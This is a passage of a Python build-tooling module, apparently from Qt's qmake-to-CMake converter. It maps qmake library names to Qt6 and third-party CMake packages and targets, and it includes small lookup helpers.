        resultVariable: typing.Optional[str] = None,
        extra: typing.Optional[typing.List[str]] = None,
        appendFoundSuffix: bool = True,
        emit_if: str = "",
        is_bundled_with_qt: bool = False,
        test_library_overwrite: str = "",
        run_library_test: bool = False,
        no_link_so_name: str = "",
    ) -> None:
        self.soName = soName
        self.packageName = packageName
        self.resultVariable = resultVariable
        self.appendFoundSuffix = appendFoundSuffix
        # Allows passing additional arguments to the generated find_package call.
        # Default is None rather than [] so each instance gets a fresh list:
        # a mutable default argument would be shared by every LibraryMapping
        # constructed without an explicit 'extra'.
        self.extra = extra if extra is not None else []
        self.targetName = targetName
        # True if qt bundles the library sources as part of Qt.
        self.is_bundled_with_qt = is_bundled_with_qt
        # if emit_if is non-empty, the generated find_package call
        # for a library will be surrounded by this condition.
        self.emit_if = emit_if
        # Allow overwriting library name when used with tests. E.g.: _nolink
        # targets do not exist when used during compile tests
        self.test_library_overwrite = test_library_overwrite
        # Run the library compile test of configure.json
        self.run_library_test = run_library_test
        # The custom nolink library mapping associated with this one.
        self.no_link_so_name = no_link_so_name

    def is_qt(self) -> bool:
        """Return True when this mapping points at a Qt package itself."""
        return self.packageName == "Qt" or self.packageName == "Qt5" or self.packageName == "Qt6"
# Maps each qmake module/library name (as seen in .pro files) to the Qt6 CMake
# package and imported target that the conversion should emit for it.
_qt_library_map = [
    # Qt:
    LibraryMapping("androidextras", "Qt6", "Qt::AndroidExtras", extra=["COMPONENTS", "AndroidExtras"]),
    LibraryMapping("3danimation", "Qt6", "Qt::3DAnimation", extra=["COMPONENTS", "3DAnimation"]),
    LibraryMapping("3dcore", "Qt6", "Qt::3DCore", extra=["COMPONENTS", "3DCore"]),
    LibraryMapping("3dcoretest", "Qt6", "Qt::3DCoreTest", extra=["COMPONENTS", "3DCoreTest"]),
    LibraryMapping("3dextras", "Qt6", "Qt::3DExtras", extra=["COMPONENTS", "3DExtras"]),
    LibraryMapping("3dinput", "Qt6", "Qt::3DInput", extra=["COMPONENTS", "3DInput"]),
    LibraryMapping("3dlogic", "Qt6", "Qt::3DLogic", extra=["COMPONENTS", "3DLogic"]),
    LibraryMapping("3dquick", "Qt6", "Qt::3DQuick", extra=["COMPONENTS", "3DQuick"]),
    LibraryMapping("3dquickextras", "Qt6", "Qt::3DQuickExtras", extra=["COMPONENTS", "3DQuickExtras"]),
    LibraryMapping("3dquickinput", "Qt6", "Qt::3DQuickInput", extra=["COMPONENTS", "3DQuickInput"]),
    LibraryMapping("3dquickrender", "Qt6", "Qt::3DQuickRender", extra=["COMPONENTS", "3DQuickRender"]),
    LibraryMapping("3drender", "Qt6", "Qt::3DRender", extra=["COMPONENTS", "3DRender"]),
    LibraryMapping("application-lib", "Qt6", "Qt::AppManApplication", extra=["COMPONENTS", "AppManApplication"]),
    LibraryMapping("axbase", "Qt6", "Qt::AxBase", extra=["COMPONENTS", "AxBase"]),
    LibraryMapping("axcontainer", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
    LibraryMapping("axserver", "Qt6", "Qt::AxServer", extra=["COMPONENTS", "AxServer"]),
    LibraryMapping("bluetooth", "Qt6", "Qt::Bluetooth", extra=["COMPONENTS", "Bluetooth"]),
    LibraryMapping("bootstrap", "Qt6", "Qt::Bootstrap", extra=["COMPONENTS", "Bootstrap"]),
    # bootstrap-dbus: Not needed in Qt6!
    LibraryMapping("client", "Qt6", "Qt::WaylandClient", extra=["COMPONENTS", "WaylandClient"]),
    LibraryMapping("coap", "Qt6", "Qt::Coap", extra=["COMPONENTS", "Coap"]),
    LibraryMapping("common-lib", "Qt6", "Qt::AppManCommon", extra=["COMPONENTS", "AppManCommon"]),
    LibraryMapping("compositor", "Qt6", "Qt::WaylandCompositor", extra=["COMPONENTS", "WaylandCompositor"]),
    LibraryMapping("concurrent", "Qt6", "Qt::Concurrent", extra=["COMPONENTS", "Concurrent"]),
    LibraryMapping("container", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
    LibraryMapping("control", "Qt6", "Qt::AxServer", extra=["COMPONENTS", "AxServer"]),
    LibraryMapping("core_headers", "Qt6", "Qt::WebEngineCore", extra=["COMPONENTS", "WebEngineCore"]),
    LibraryMapping("core", "Qt6", "Qt::Core", extra=["COMPONENTS", "Core"]),
    LibraryMapping("crypto-lib", "Qt6", "Qt::AppManCrypto", extra=["COMPONENTS", "AppManCrypto"]),
    LibraryMapping("dbus", "Qt6", "Qt::DBus", extra=["COMPONENTS", "DBus"]),
    LibraryMapping("designer", "Qt6", "Qt::Designer", extra=["COMPONENTS", "Designer"]),
    LibraryMapping(
        "designercomponents",
        "Qt6",
        "Qt::DesignerComponents",
        extra=["COMPONENTS", "DesignerComponents"],
    ),
    LibraryMapping(
        "devicediscovery",
        "Qt6",
        "Qt::DeviceDiscoverySupport",
        extra=["COMPONENTS", "DeviceDiscoverySupport"],
    ),
    LibraryMapping(
        "devicediscovery_support",
        "Qt6",
        "Qt::DeviceDiscoverySupport",
        extra=["COMPONENTS", "DeviceDiscoverySupport"],
    ),
    LibraryMapping("edid", "Qt6", "Qt::EdidSupport", extra=["COMPONENTS", "EdidSupport"]),
    LibraryMapping("edid_support", "Qt6", "Qt::EdidSupport", extra=["COMPONENTS", "EdidSupport"]),
    LibraryMapping("eglconvenience", "Qt6", "Qt::EglSupport", extra=["COMPONENTS", "EglSupport"]),
    LibraryMapping(
        "eglfsdeviceintegration",
        "Qt6",
        "Qt::EglFSDeviceIntegration",
        extra=["COMPONENTS", "EglFSDeviceIntegration"],
    ),
    LibraryMapping("eglfs_kms_support", "Qt6", "Qt::EglFsKmsSupport", extra=["COMPONENTS", "EglFsKmsSupport"]),
    LibraryMapping(
        "eglfs_kms_gbm_support",
        "Qt6",
        "Qt::EglFsKmsGbmSupport",
        extra=["COMPONENTS", "EglFsKmsGbmSupport"],
    ),
    LibraryMapping("egl_support", "Qt6", "Qt::EglSupport", extra=["COMPONENTS", "EglSupport"]),
    # enginio: Not needed in Qt6!
    LibraryMapping(
        "eventdispatchers",
        "Qt6",
        "Qt::EventDispatcherSupport",
        extra=["COMPONENTS", "EventDispatcherSupport"],
    ),
    LibraryMapping(
        "eventdispatcher_support",
        "Qt6",
        "Qt::EventDispatcherSupport",
        extra=["COMPONENTS", "EventDispatcherSupport"],
    ),
    LibraryMapping("fbconvenience", "Qt6", "Qt::FbSupport", extra=["COMPONENTS", "FbSupport"]),
    LibraryMapping("fb_support", "Qt6", "Qt::FbSupport", extra=["COMPONENTS", "FbSupport"]),
    LibraryMapping(
        "fontdatabase_support",
        "Qt6",
        "Qt::FontDatabaseSupport",
        extra=["COMPONENTS", "FontDatabaseSupport"],
    ),
    LibraryMapping("gamepad", "Qt6", "Qt::Gamepad", extra=["COMPONENTS", "Gamepad"]),
    LibraryMapping(
        "global", "Qt6", "Qt::Core", extra=["COMPONENTS", "Core"]
    ),  # manually added special case
    LibraryMapping("glx_support", "Qt6", "Qt::GlxSupport", extra=["COMPONENTS", "GlxSupport"]),
    LibraryMapping("gsttools", "Qt6", "Qt::MultimediaGstTools", extra=["COMPONENTS", "MultimediaGstTools"]),
    LibraryMapping("gui", "Qt6", "Qt::Gui", extra=["COMPONENTS", "Gui"]),
    LibraryMapping("help", "Qt6", "Qt::Help", extra=["COMPONENTS", "Help"]),
    LibraryMapping(
        "hunspellinputmethod",
        "Qt6",
        "Qt::HunspellInputMethod",
        extra=["COMPONENTS", "HunspellInputMethod"],
    ),
    LibraryMapping("input", "Qt6", "Qt::InputSupport", extra=["COMPONENTS", "InputSupport"]),
    LibraryMapping("input_support", "Qt6", "Qt::InputSupport", extra=["COMPONENTS", "InputSupport"]),
    LibraryMapping("installer-lib", "Qt6", "Qt::AppManInstaller", extra=["COMPONENTS", "AppManInstaller"]),
    LibraryMapping("knx", "Qt6", "Qt::Knx", extra=["COMPONENTS", "Knx"]),
    LibraryMapping("kmsconvenience", "Qt6", "Qt::KmsSupport", extra=["COMPONENTS", "KmsSupport"]),
    LibraryMapping("kms_support", "Qt6", "Qt::KmsSupport", extra=["COMPONENTS", "KmsSupport"]),
    LibraryMapping("launcher-lib", "Qt6", "Qt::AppManLauncher", extra=["COMPONENTS", "AppManLauncher"]),
    LibraryMapping("lib", "Qt6", "Qt::Designer", extra=["COMPONENTS", "Designer"]),
    LibraryMapping(
        "linuxaccessibility_support",
        "Qt6",
        "Qt::LinuxAccessibilitySupport",
        extra=["COMPONENTS", "LinuxAccessibilitySupport"],
    ),
    LibraryMapping("location", "Qt6", "Qt::Location", extra=["COMPONENTS", "Location"]),
    LibraryMapping("macextras", "Qt6", "Qt::MacExtras", extra=["COMPONENTS", "MacExtras"]),
    LibraryMapping("main-lib", "Qt6", "Qt::AppManMain", extra=["COMPONENTS", "AppManMain"]),
    LibraryMapping("manager-lib", "Qt6", "Qt::AppManManager", extra=["COMPONENTS", "AppManManager"]),
    LibraryMapping("monitor-lib", "Qt6", "Qt::AppManMonitor", extra=["COMPONENTS", "AppManMonitor"]),
    LibraryMapping("mqtt", "Qt6", "Qt::Mqtt", extra=["COMPONENTS", "Mqtt"]),
    LibraryMapping("multimedia", "Qt6", "Qt::Multimedia", extra=["COMPONENTS", "Multimedia"]),
    LibraryMapping(
        "multimediawidgets",
        "Qt6",
        "Qt::MultimediaWidgets",
        extra=["COMPONENTS", "MultimediaWidgets"],
    ),
    LibraryMapping("network", "Qt6", "Qt::Network", extra=["COMPONENTS", "Network"]),
    LibraryMapping("networkauth", "Qt6", "Qt::NetworkAuth", extra=["COMPONENTS", "NetworkAuth"]),
    LibraryMapping("nfc", "Qt6", "Qt::Nfc", extra=["COMPONENTS", "Nfc"]),
    LibraryMapping("oauth", "Qt6", "Qt::NetworkAuth", extra=["COMPONENTS", "NetworkAuth"]),
    LibraryMapping("opcua", "Qt6", "Qt::OpcUa", extra=["COMPONENTS", "OpcUa"]),
    LibraryMapping("opcua_private", "Qt6", "Qt::OpcUaPrivate", extra=["COMPONENTS", "OpcUaPrivate"]),
    LibraryMapping("opengl", "Qt6", "Qt::OpenGL", extra=["COMPONENTS", "OpenGL"]),
    LibraryMapping("openglwidgets", "Qt6", "Qt::OpenGLWidgets", extra=["COMPONENTS", "OpenGLWidgets"]),
    LibraryMapping("package-lib", "Qt6", "Qt::AppManPackage", extra=["COMPONENTS", "AppManPackage"]),
    LibraryMapping("packetprotocol", "Qt6", "Qt::PacketProtocol", extra=["COMPONENTS", "PacketProtocol"]),
    LibraryMapping("particles", "Qt6", "Qt::QuickParticles", extra=["COMPONENTS", "QuickParticles"]),
    LibraryMapping(
        "plugin-interfaces",
        "Qt6",
        "Qt::AppManPluginInterfaces",
        extra=["COMPONENTS", "AppManPluginInterfaces"],
    ),
    LibraryMapping("positioning", "Qt6", "Qt::Positioning", extra=["COMPONENTS", "Positioning"]),
    LibraryMapping("positioningquick", "Qt6", "Qt::PositioningQuick", extra=["COMPONENTS", "PositioningQuick"]),
    LibraryMapping("printsupport", "Qt6", "Qt::PrintSupport", extra=["COMPONENTS", "PrintSupport"]),
    LibraryMapping("purchasing", "Qt6", "Qt::Purchasing", extra=["COMPONENTS", "Purchasing"]),
    LibraryMapping("qmldebug", "Qt6", "Qt::QmlDebug", extra=["COMPONENTS", "QmlDebug"]),
    LibraryMapping("qmldevtools", "Qt6", "Qt::QmlDevTools", extra=["COMPONENTS", "QmlDevTools"]),
    LibraryMapping("qmlcompiler", "Qt6", "Qt::QmlCompiler", extra=["COMPONENTS", "QmlCompiler"]),
    LibraryMapping("qml", "Qt6", "Qt::Qml", extra=["COMPONENTS", "Qml"]),
    LibraryMapping("qmldom", "Qt6", "Qt::QmlDom", extra=["COMPONENTS", "QmlDom"]),
    LibraryMapping("qmlmodels", "Qt6", "Qt::QmlModels", extra=["COMPONENTS", "QmlModels"]),
    LibraryMapping("qmltest", "Qt6", "Qt::QuickTest", extra=["COMPONENTS", "QuickTest"]),
    LibraryMapping(
        "qtmultimediaquicktools",
        "Qt6",
        "Qt::MultimediaQuick",
        extra=["COMPONENTS", "MultimediaQuick"],
    ),
    LibraryMapping(
        "quick3dassetimport",
        "Qt6",
        "Qt::Quick3DAssetImport",
        extra=["COMPONENTS", "Quick3DAssetImport"],
    ),
    LibraryMapping("core5compat", "Qt6", "Qt::Core5Compat", extra=["COMPONENTS", "Core5Compat"]),
    LibraryMapping("quick3d", "Qt6", "Qt::Quick3D", extra=["COMPONENTS", "Quick3D"]),
    LibraryMapping("quick3drender", "Qt6", "Qt::Quick3DRender", extra=["COMPONENTS", "Quick3DRender"]),
    LibraryMapping(
        "quick3druntimerender",
        "Qt6",
        "Qt::Quick3DRuntimeRender",
        extra=["COMPONENTS", "Quick3DRuntimeRender"],
    ),
    LibraryMapping("quick3dutils", "Qt6", "Qt::Quick3DUtils", extra=["COMPONENTS", "Quick3DUtils"]),
    LibraryMapping("quickcontrols2", "Qt6", "Qt::QuickControls2", extra=["COMPONENTS", "QuickControls2"]),
    LibraryMapping(
        "quickcontrols2impl",
        "Qt6",
        "Qt::QuickControls2Impl",
        extra=["COMPONENTS", "QuickControls2Impl"],
    ),
    LibraryMapping("quick", "Qt6", "Qt::Quick", extra=["COMPONENTS", "Quick"]),
    LibraryMapping("quickshapes", "Qt6", "Qt::QuickShapes", extra=["COMPONENTS", "QuickShapes"]),
    LibraryMapping("quicktemplates2", "Qt6", "Qt::QuickTemplates2", extra=["COMPONENTS", "QuickTemplates2"]),
    LibraryMapping("quickwidgets", "Qt6", "Qt::QuickWidgets", extra=["COMPONENTS", "QuickWidgets"]),
    LibraryMapping("remoteobjects", "Qt6", "Qt::RemoteObjects", extra=["COMPONENTS", "RemoteObjects"]),
    LibraryMapping("script", "Qt6", "Qt::Script", extra=["COMPONENTS", "Script"]),
    LibraryMapping("scripttools", "Qt6", "Qt::ScriptTools", extra=["COMPONENTS", "ScriptTools"]),
    LibraryMapping("scxml", "Qt6", "Qt::Scxml", extra=["COMPONENTS", "Scxml"]),
    LibraryMapping("sensors", "Qt6", "Qt::Sensors", extra=["COMPONENTS", "Sensors"]),
    LibraryMapping("serialport", "Qt6", "Qt::SerialPort", extra=["COMPONENTS", "SerialPort"]),
    LibraryMapping("serialbus", "Qt6", "Qt::SerialBus", extra=["COMPONENTS", "SerialBus"]),
    LibraryMapping("services", "Qt6", "Qt::ServiceSupport", extra=["COMPONENTS", "ServiceSupport"]),
    LibraryMapping("service_support", "Qt6", "Qt::ServiceSupport", extra=["COMPONENTS", "ServiceSupport"]),
    LibraryMapping("shadertools", "Qt6", "Qt::ShaderTools", extra=["COMPONENTS", "ShaderTools"]),
    LibraryMapping("sql", "Qt6", "Qt::Sql", extra=["COMPONENTS", "Sql"]),
    LibraryMapping("svg", "Qt6", "Qt::Svg", extra=["COMPONENTS", "Svg"]),
    LibraryMapping("svgwidgets", "Qt6", "Qt::SvgWidgets", extra=["COMPONENTS", "SvgWidgets"]),
    LibraryMapping("charts", "Qt6", "Qt::Charts", extra=["COMPONENTS", "Charts"]),
    LibraryMapping("testlib", "Qt6", "Qt::Test", extra=["COMPONENTS", "Test"]),
    LibraryMapping("texttospeech", "Qt6", "Qt::TextToSpeech", extra=["COMPONENTS", "TextToSpeech"]),
    LibraryMapping("theme_support", "Qt6", "Qt::ThemeSupport", extra=["COMPONENTS", "ThemeSupport"]),
    LibraryMapping("tts", "Qt6", "Qt::TextToSpeech", extra=["COMPONENTS", "TextToSpeech"]),
    LibraryMapping("uiplugin", "Qt6", "Qt::UiPlugin", extra=["COMPONENTS", "UiPlugin"]),
    LibraryMapping("uitools", "Qt6", "Qt::UiTools", extra=["COMPONENTS", "UiTools"]),
    LibraryMapping("virtualkeyboard", "Qt6", "Qt::VirtualKeyboard", extra=["COMPONENTS", "VirtualKeyboard"]),
    LibraryMapping("waylandclient", "Qt6", "Qt::WaylandClient", extra=["COMPONENTS", "WaylandClient"]),
    LibraryMapping(
        "waylandcompositor",
        "Qt6",
        "Qt::WaylandCompositor",
        extra=["COMPONENTS", "WaylandCompositor"],
    ),
    LibraryMapping("webchannel", "Qt6", "Qt::WebChannel", extra=["COMPONENTS", "WebChannel"]),
    LibraryMapping("webengine", "Qt6", "Qt::WebEngine", extra=["COMPONENTS", "WebEngine"]),
    LibraryMapping("webenginewidgets", "Qt6", "Qt::WebEngineWidgets", extra=["COMPONENTS", "WebEngineWidgets"]),
    LibraryMapping("websockets", "Qt6", "Qt::WebSockets", extra=["COMPONENTS", "WebSockets"]),
    LibraryMapping("webview", "Qt6", "Qt::WebView", extra=["COMPONENTS", "WebView"]),
    LibraryMapping("widgets", "Qt6", "Qt::Widgets", extra=["COMPONENTS", "Widgets"]),
    LibraryMapping("window-lib", "Qt6", "Qt::AppManWindow", extra=["COMPONENTS", "AppManWindow"]),
    LibraryMapping("winextras", "Qt6", "Qt::WinExtras", extra=["COMPONENTS", "WinExtras"]),
    LibraryMapping("x11extras", "Qt6", "Qt::X11Extras", extra=["COMPONENTS", "X11Extras"]),
    LibraryMapping("xcb_qpa_lib", "Qt6", "Qt::XcbQpa", extra=["COMPONENTS", "XcbQpa"]),
    LibraryMapping("xkbcommon_support", "Qt6", "Qt::XkbCommonSupport", extra=["COMPONENTS", "XkbCommonSupport"]),
    LibraryMapping("xmlpatterns", "Qt6", "Qt::XmlPatterns", extra=["COMPONENTS", "XmlPatterns"]),
    LibraryMapping("xml", "Qt6", "Qt::Xml", extra=["COMPONENTS", "Xml"]),
    LibraryMapping("qmlworkerscript", "Qt6", "Qt::QmlWorkerScript", extra=["COMPONENTS", "QmlWorkerScript"]),
    LibraryMapping("quickparticles", "Qt6", "Qt::QuickParticles", extra=["COMPONENTS", "QuickParticles"]),
    LibraryMapping(
        "linuxofono_support",
        "Qt6",
        "Qt::LinuxOfonoSupport",
        extra=["COMPONENTS", "LinuxOfonoSupport"],
    ),
    LibraryMapping(
        "linuxofono_support_private",
        "Qt6",
        "Qt::LinuxOfonoSupportPrivate",
        extra=["COMPONENTS", "LinuxOfonoSupportPrivate"],
    ),
    LibraryMapping("tools", "Qt6", "Qt::Tools", extra=["COMPONENTS", "Tools"]),
    # NOTE(review): exact duplicate of the "axcontainer" entry earlier in this
    # list - candidate for removal.
    LibraryMapping("axcontainer", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
    LibraryMapping("webkitwidgets", "Qt6", "Qt::WebKitWidgets", extra=["COMPONENTS", "WebKitWidgets"]),
    LibraryMapping("zlib", "Qt6", "Qt::Zlib", extra=["COMPONENTS", "Zlib"]),
    LibraryMapping("httpserver", "Qt6", "Qt::HttpServer", extra=["COMPONENTS", "HttpServer"]),
    # NOTE(review): component here is "HttpServer", not "SslServer" - presumably
    # the SslServer target ships with the HttpServer component; verify upstream.
    LibraryMapping("sslserver", "Qt6", "Qt::SslServer", extra=["COMPONENTS", "HttpServer"]),
]
# Note that the library map is adjusted dynamically further down.
_library_map = [
# 3rd party:
LibraryMapping("atspi", "ATSPI2", "PkgConfig::ATSPI2"),
LibraryMapping("bluez", "BlueZ", "PkgConfig::BlueZ"),
LibraryMapping("brotli", "WrapBrotli", "WrapBrotli::WrapBrotliDec"),
LibraryMapping("corewlan", None, None),
LibraryMapping("cups", "Cups", "Cups::Cups"),
LibraryMapping("directfb", "DirectFB", "PkgConfig::DirectFB"),
LibraryMapping("db2", "DB2", "DB2::DB2"),
LibraryMapping("dbus", "WrapDBus1", "dbus-1", resultVariable="DBus1", extra=["1.2"]),
LibraryMapping(
"doubleconversion", "WrapDoubleConversion", "WrapDoubleConversion::WrapDoubleConversion"
),
LibraryMapping("drm", "Libdrm", "Libdrm::Libdrm"),
LibraryMapping("egl", "EGL", "EGL::EGL"),
LibraryMapping("flite", "Flite", "Flite::Flite"),
LibraryMapping("flite_alsa", "ALSA", "ALSA::ALSA"),
LibraryMapping(
"fontconfig", "Fontconfig", "Fontconfig::Fontconfig", resultVariable="FONTCONFIG"
),
LibraryMapping(
"freetype",
"WrapFreetype",
"WrapFreetype::WrapFreetype",
extra=["2.2.0", "REQUIRED"],
is_bundled_with_qt=True,
),
LibraryMapping("gbm", "gbm", "gbm::gbm"),
LibraryMapping("glib", "GLIB2", "GLIB2::GLIB2"),
LibraryMapping("iconv", "WrapIconv", "WrapIconv::WrapIconv"),
LibraryMapping("gtk3", "GTK3", "PkgConfig::GTK3", extra=["3.6"]),
LibraryMapping("gssapi", "GSSAPI", "GSSAPI::GSSAPI"),
LibraryMapping(
"harfbuzz",
"WrapHarfbuzz",
"WrapHarfbuzz::WrapHarfbuzz",
is_bundled_with_qt=True,
extra=["2.6.0"],
),
LibraryMapping("host_dbus", None, None),
LibraryMapping(
"icu", "ICU", "ICU::i18n ICU::uc ICU::data", extra=["COMPONENTS", "i18n", "uc", "data"]
),
LibraryMapping("journald", "Libsystemd", "PkgConfig::Libsystemd"),
LibraryMapping("jpeg", "JPEG", "JPEG::JPEG"), # see also libjpeg
LibraryMapping("libatomic", "WrapAtomic", "WrapAtomic::WrapAtomic"),
LibraryMapping("libb2", "Libb2", "PkgConfig::Libb2"),
LibraryMapping("libclang", "WrapLibClang", "WrapLibClang::WrapLibClang"),
LibraryMapping("libdl", None, "${CMAKE_DL_LIBS}"),
LibraryMapping("libinput", "Libinput", "Libinput::Libinput"),
LibraryMapping("libjpeg", "JPEG", "JPEG::JPEG"), # see also jpeg
LibraryMapping("libpng", "WrapPNG", "WrapPNG::WrapPNG", is_bundled_with_qt=True),
LibraryMapping("libproxy", "Libproxy", "PkgConfig::Libproxy"),
LibraryMapping("librt", "WrapRt", "WrapRt::WrapRt"),
LibraryMapping("libudev", "Libudev", "PkgConfig::Libudev"),
LibraryMapping("lttng-ust", "LTTngUST", "LTTng::UST", resultVariable="LTTNGUST"),
LibraryMapping("mtdev", "Mtdev", "PkgConfig::Mtdev"),
LibraryMapping("mysql", "MySQL", "MySQL::MySQL"),
LibraryMapping("odbc", "ODBC", "ODBC::ODBC"),
LibraryMapping("opengl_es2", "GLESv2", "GLESv2::GLESv2"),
LibraryMapping("opengl", "WrapOpenGL", "WrapOpenGL::WrapOpenGL", resultVariable="WrapOpenGL"),
LibraryMapping(
"openssl_headers",
"WrapOpenSSLHeaders",
"WrapOpenSSLHeaders::WrapOpenSSLHeaders",
resultVariable="TEST_openssl_headers",
appendFoundSuffix=False,
test_library_overwrite="WrapOpenSSLHeaders::WrapOpenSSLHeaders",
run_library_test=True,
),
LibraryMapping(
"openssl",
"WrapOpenSSL",
"WrapOpenSSL::WrapOpenSSL",
resultVariable="TEST_openssl",
appendFoundSuffix=False,
run_library_test=True,
no_link_so_name="openssl_headers",
),
LibraryMapping("oci", "Oracle", "Oracle::OCI"),
LibraryMapping(
"pcre2",
"WrapPCRE2",
"WrapPCRE2::WrapPCRE2",
extra=["10.20", "REQUIRED"],
is_bundled_with_qt=True,
),
LibraryMapping("pps", "PPS", "PPS::PPS"),
LibraryMapping("psql", "PostgreSQL", "PostgreSQL::PostgreSQL"),
LibraryMapping("slog2", "Slog2", "Slog2::Slog2"),
LibraryMapping("speechd", "SpeechDispatcher", "SpeechDispatcher::SpeechDispatcher"),
LibraryMapping("sqlite2", None, None), # No more sqlite2 support in Qt6!
LibraryMapping("sqlite3", "SQLite3", "SQLite::SQLite3"),
LibraryMapping("sqlite", "SQLite3", "SQLite::SQLite3"),
LibraryMapping("tslib", "Tslib", "PkgConfig::Tslib"),
LibraryMapping("udev", "Libudev", "PkgConfig::Libudev"),
LibraryMapping("udev", "Libudev", "PkgConfig::Libudev"), # see also libudev!
LibraryMapping("vulkan", "Vulkan", "Vulkan::Vulkan"),
LibraryMapping("wayland_server", "Wayland", "Wayland::Server"), # used in qtbase/src/gui
LibraryMapping("wayland-server", "Wayland", "Wayland::Server"), # used in qtwayland
LibraryMapping("wayland-client", "Wayland", "Wayland::Client"),
LibraryMapping("wayland-cursor", "Wayland", "Wayland::Cursor"),
LibraryMapping("wayland-egl", "Wayland", "Wayland::Egl"),
LibraryMapping(
"wayland-kms", "Waylandkms", "PkgConfig::Waylandkms"
), # TODO: check if this actually works
LibraryMapping("x11", "X11", "X11::X11"),
LibraryMapping("x11sm", "X11", "${X11_SM_LIB} ${X11_ICE_LIB}", resultVariable="X11_SM"),
LibraryMapping(
"xcb",
"XCB",
"XCB::XCB",
extra=["1.11"],
resultVariable="TARGET XCB::XCB",
appendFoundSuffix=False,
),
LibraryMapping(
"xcb_glx", "XCB", "XCB::GLX", extra=["COMPONENTS", "GLX"], resultVariable="XCB_GLX"
),
LibraryMapping(
"xcb_icccm",
"XCB",
"XCB::ICCCM",
extra=["0.3.9", "COMPONENTS", "ICCCM"],
resultVariable="XCB_ICCCM",
),
LibraryMapping(
"xcb_image",
"XCB",
"XCB::IMAGE",
extra=["0.3.9", "COMPONENTS", "IMAGE"],
resultVariable="XCB_IMAGE",
),
LibraryMapping(
"xcb_keysyms",
"XCB",
"XCB::KEYSYMS",
extra=["0.3.9", "COMPONENTS", "KEYSYMS"],
resultVariable="XCB_KEYSYMS",
),
LibraryMapping(
"xcb_randr", "XCB", "XCB::RANDR", extra=["COMPONENTS", "RANDR"], resultVariable="XCB_RANDR"
),
LibraryMapping(
"xcb_render",
"XCB",
"XCB::RENDER",
extra=["COMPONENTS", "RENDER"],
resultVariable="XCB_RENDER",
),
LibraryMapping(
"xcb_renderutil",
"XCB",
"XCB::RENDERUTIL",
extra=["0.3.9", "COMPONENTS", "RENDERUTIL"],
resultVariable="XCB_RENDERUTIL",
),
LibraryMapping(
"xcb_shape", "XCB", "XCB::SHAPE", extra=["COMPONENTS", "SHAPE"], resultVariable="XCB_SHAPE"
),
LibraryMapping(
"xcb_shm", "XCB", "XCB::SHM", extra=["COMPONENTS", "SHM"], resultVariable="XCB_SHM"
),
LibraryMapping(
"xcb_sync", "XCB", "XCB::SYNC", extra=["COMPONENTS", "SYNC"], resultVariable="XCB_SYNC"
),
LibraryMapping(
"xcb_xfixes",
"XCB",
"XCB::XFIXES",
extra=["COMPONENTS", "XFIXES"],
resultVariable="XCB_XFIXES",
),
LibraryMapping(
"xcb-xfixes",
"XCB",
"XCB::XFIXES",
extra=["COMPONENTS", "XFIXES"],
resultVariable="XCB_XFIXES",
),
LibraryMapping(
"xcb_xinput",
"XCB",
"XCB::XINPUT",
extra=["1.12", "COMPONENTS", "XINPUT"],
resultVariable="XCB_XINPUT",
),
LibraryMapping(
"xcb_xkb", "XCB", "XCB::XKB", extra=["COMPONENTS", "XKB"], resultVariable="XCB_XKB"
),
LibraryMapping("xcb_xlib", "X11_XCB", "X11::XCB"),
LibraryMapping("xcomposite", "XComposite", "PkgConfig::XComposite"),
LibraryMapping("xkbcommon_evdev", "XKB", "XKB::XKB", extra=["0.5.0"]), # see also xkbcommon
LibraryMapping("xkbcommon_x11", "XKB_COMMON_X11", "PkgConfig::XKB_COMMON_X11", extra=["0.5.0"]),
LibraryMapping("xkbcommon", "XKB", "XKB::XKB", extra=["0.5.0"]),
LibraryMapping("xlib", "X11", "X11::X11"),
LibraryMapping("xrender", "XRender", "PkgConfig::XRender", extra=["0.6"]),
LibraryMapping("zlib", "ZLIB", "ZLIB::ZLIB", extra=["1.0.8"]),
LibraryMapping("zstd", "ZSTD", "ZSTD::ZSTD", extra=["1.3"]),
LibraryMapping("tiff", "TIFF", "TIFF::TIFF"),
LibraryMapping("webp", "WrapWebP", "WrapWebP::WrapWebP"),
LibraryMapping("jasper", "WrapJasper", "WrapJasper::WrapJasper"),
LibraryMapping("sdl2", "WrapSDL2", "WrapSDL2::WrapSDL2"),
LibraryMapping("hunspell", "Hunspell", "Hunspell::Hunspell"),
LibraryMapping(
"qt3d-assimp",
"WrapQt3DAssimp",
"WrapQt3DAssimp::WrapQt3DAssimp",
extra=["5"],
run_library_test=True,
resultVariable="TEST_assimp",
appendFoundSuffix=False,
),
LibraryMapping(
"quick3d_assimp",
"WrapQuick3DAssimp",
"WrapQuick3DAssimp::WrapQuick3DAssimp",
extra=["5"],
run_library_test=True,
resultVariable="TEST_quick3d_assimp",
appendFoundSuffix=False,
),
]
def _adjust_library_map():
    """Post-process ``_library_map`` in place.

    Assign a Linux condition on all x and wayland related packages.
    We don't want to get pages of package not found messages on
    Windows and macOS, and this also improves configure time on
    those platforms.
    """
    linux_package_prefixes = ("xcb", "x11", "xkb", "xrender", "xlib", "wayland")
    for mapping in _library_map:
        # str.startswith accepts a tuple of prefixes, so the previous
        # any([...]) over a throwaway list is unnecessary; the entries are
        # mutable objects, so direct iteration replaces index-based access.
        if mapping.soName.startswith(linux_package_prefixes):
            mapping.emit_if = "config.linux"
_adjust_library_map()
def find_3rd_party_library_mapping(soName: str) -> typing.Optional[LibraryMapping]:
    """Return the 3rd-party LibraryMapping with the given soName, or None."""
    return next((mapping for mapping in _library_map if mapping.soName == soName), None)
def find_qt_library_mapping(soName: str) -> typing.Optional[LibraryMapping]:
    """Return the Qt LibraryMapping with the given soName, or None."""
    return next((mapping for mapping in _qt_library_map if mapping.soName == soName), None)
def find_library_info_for_target(targetName: str) -> typing.Optional[LibraryMapping]:
    """Look up a LibraryMapping by CMake target name, Qt mappings first.

    For the Qt lookup a trailing "Private" suffix is stripped, so e.g.
    "Qt::CorePrivate" resolves to the "Qt::Core" mapping.  The 3rd-party
    map is searched with the unmodified name.  Returns None when no
    mapping matches.
    """
    qt_target = targetName[:-7] if targetName.endswith("Private") else targetName
    for mapping in _qt_library_map:
        if mapping.targetName == qt_target:
            return mapping
    for mapping in _library_map:
        if mapping.targetName == targetName:
            return mapping
    return None
# For a given qmake library (e.g. 'openssl_headers'), check whether this is a fake library used
# for the /nolink annotation, and return the actual annotated qmake library ('openssl/nolink').
def find_annotated_qmake_lib_name(lib: str) -> str:
